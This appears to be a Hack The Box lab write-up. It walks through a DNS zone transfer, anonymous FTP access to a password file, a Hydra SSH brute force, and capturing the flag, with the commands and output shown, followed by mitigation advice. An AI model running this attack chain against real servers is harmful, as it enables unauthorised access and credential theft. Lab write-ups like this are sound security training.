Attacking Common Services-Medium

Table of Contents #

Scope Of Work
Information Gathering
Exploitation
Mitigation Recommendations
Lessons Learned

Scope of work #

The second server is an internal server storing emails and files as a backup. The server isn't used often, and when it is, it's mainly for testing purposes. The IP of the server is 10.129.90.235

Information Gathering #

Since I only have one target, I create an IP variable in .zshrc and run a full NMAP scan of the target. nmap -Pn -sS -sV -sC -p- $IP -oA med.scan -v.

--Snip--
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
110/tcp   open  pop3     Dovecot pop3d
995/tcp   open  ssl/pop3 Dovecot pop3d
2121/tcp  open  ftp      ProFTPD
30021/tcp open  unknown
--Snip--

With port 53 open, this tells me it's a DNS server. I'm able to do a successful DNS Zone transfer.

dig axfr inlanefreight.htb @$IP
; <<>> DiG 9.20.22-1-Debian <<>> axfr inlanefreight.htb @10.129.90.235
;; global options: +cmd
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN      A       10.129.200.5
dc1.inlanefreight.htb.  604800  IN      A       10.129.100.10
dc2.inlanefreight.htb.  604800  IN      A       10.129.200.10
int-ftp.inlanefreight.htb. 604800 IN    A       127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN    A       10.129.200.70
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1
un.inlanefreight.htb.   604800  IN      A       10.129.200.142
ws1.inlanefreight.htb.  604800  IN      A       10.129.200.101
ws2.inlanefreight.htb.  604800  IN      A       10.129.200.102
wsus.inlanefreight.htb. 604800  IN      A       10.129.200.80
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 239 msec
;; SERVER: 10.129.90.235#53(10.129.90.235) (TCP)
;; WHEN: Tue May 05 12:13:27 EDT 2026
;; XFR size: 13 records (messages 1, bytes 372)

The int-ftp address is a loopback, indicating this is an internal name record, and added 10.129.90.235 int-ftp.inlanefreight.htb to /etc/hosts.

I tried to do an anonymous login with ftp int-ftp.inlanefreight.htb 2121 but it failed. The next attempt I tried ftp int-ftp.inlanefreight.htb 30021 and was able to get in.

With access to the FTP server, I started looking around. The ls command returned a directory called "simon." I copied the file called "mynotes.txt" and closed the FTP connection.

ftp> ls
229 Entering Extended Passive Mode (|||4946|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 simon
226 Transfer complete
ftp> cd simon
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||8376|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp           153 Apr 18  2022 mynotes.txt
226 Transfer complete
ftp> get mynotes.txt
local: mynotes.txt remote: mynotes.txt
229 Entering Extended Passive Mode (|||39343|)
150 Opening BINARY mode data connection for mynotes.txt (153 bytes)
100% |***********************************************************************|   153        2.99 KiB/s    00:00 ETA
226 Transfer complete
153 bytes received in 00:00 (0.49 KiB/s)

When I read the text file, it appeared to be a list of passwords.

cat mynotes.txt
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
8Ns8j1b!23hs4921smHzwn
237oHs71ohls18H127!!9skaP
238u1xjn1923nZGSb261Bs81

Exploitation #

Using Hydra, I was able to brute force Simon's SSH password.

hydra -l simon -P mynotes.txt ssh://$IP
--SNIP--
[22][ssh] host: 10.129.90.235   login: simon   password: 8Ns8j1b!23hs4921smHzwn
--SNIP--

With a username and password, I was able to log in to the server as Simon and retrieve the flag.

 ssh simon@$IP
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
simon@10.129.90.235's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-107-generic x86_64)
--SNIP--
simon@lin-medium:~$ ls
flag.txt  Maildir
simon@lin-medium:~$ cat flag.txt 
HTB{1qay2wsx3EDC4rfv_M3D1UM}

Mitigation Recommendations #

Disable anonymous FTP login - Anyone with access to the server can log in and download/upload files. This can allow attackers to upload a reverse shell or download sensitive data
Don't keep sensitive data on a shared file system - A list of usernames, passwords, hashes, or anything else an attacker can use to log in with is a gold mine. If maintaining sensitive data on a shared drive is required, ensure it's encrypted and utilize access controls.
Log in attempts - Create a limit on how many times a wrong password can be entered on an account. This wouldn't have stopped the hydra scan, but it could have slowed it down.

Lessons Learned #

Try a zone transfer if Port 53 is open
When a name record has a loopback address, it's local to @IP

#pentsting #hacking

last updated: 2026-05-05